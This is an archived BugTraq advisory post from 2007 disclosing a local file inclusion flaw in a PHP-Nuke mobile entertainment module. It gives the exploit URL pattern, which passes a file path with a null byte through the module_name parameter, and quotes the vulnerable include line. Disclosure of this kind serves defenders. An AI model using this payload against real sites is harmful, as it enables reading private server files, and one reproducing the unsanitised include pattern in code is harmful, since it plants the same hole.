BugTraq
Nuke Mobile Entartainment Local File Inclusion Sep 23 2007 09:41PM
h3llcode hotmail it
-----------------------------------------------
# Found by Seph1roth
# http://blackroots.it
-----------------------------------------------

# Vulnerable script download
http://www.suonerie-polifoniche-gratis.net/mobilentertainment.zip

# Bug : http://VICTIM/[path]/data/compatible.php?module_name=[Local File]%00

# This is the vulnerable code :

# include 'modules/'.$module_name.'compatibility/data/marque.data.php';

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus